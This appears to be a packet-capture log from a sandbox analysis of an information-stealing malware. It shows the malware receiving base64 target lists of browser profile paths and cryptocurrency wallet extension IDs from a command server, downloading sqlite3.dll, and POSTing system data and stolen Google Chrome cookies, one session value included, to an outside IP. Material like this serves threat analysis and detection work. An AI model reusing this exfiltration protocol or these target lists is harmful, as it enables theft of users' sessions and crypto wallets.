Sep 27, 2024 04:21:15.512022972 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 27, 2024 04:21:15.512056112 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 27, 2024 04:21:15.513345003 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"plugins------CBKJJEHCBAKFBFHJKFBK--
Sep 27, 2024 04:21:15.742940903 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 27, 2024 04:21:15.742957115 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 27, 2024 04:21:15.742969036 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 27, 2024 04:21:15.743069887 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 27, 2024 04:21:15.743081093 CEST	896	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Sep 27, 2024 04:21:15.743091106 CEST	960	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Sep 27, 2024 04:21:15.830434084 CEST	544	IN	Data Raw: 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 Data Ascii: ZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5
Sep 27, 2024 04:21:15.831739902 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"fplugins------BKEBFHIJECFIDGDGCGHC--
Sep 27, 2024 04:21:16.060045004 CEST	335	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 27, 2024 04:21:16.085285902 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG Host: 185.215.113.17 Content-Length: 6567 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:21:16.085330009 CEST	6567	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 27, 2024 04:21:16.426794052 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:16.762638092 CEST	93	OUT	GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:16.988400936 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 27, 2024 04:21:16.988519907 CEST	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 27, 2024 04:21:16.988573074 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:21:18.507190943 CEST	952	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG Host: 185.215.113.17 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------IIEBGIDAAFHIJJJJEGCG--
Sep 27, 2024 04:21:18.813164949 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:19.188080072 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
Sep 27, 2024 04:21:19.496686935 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
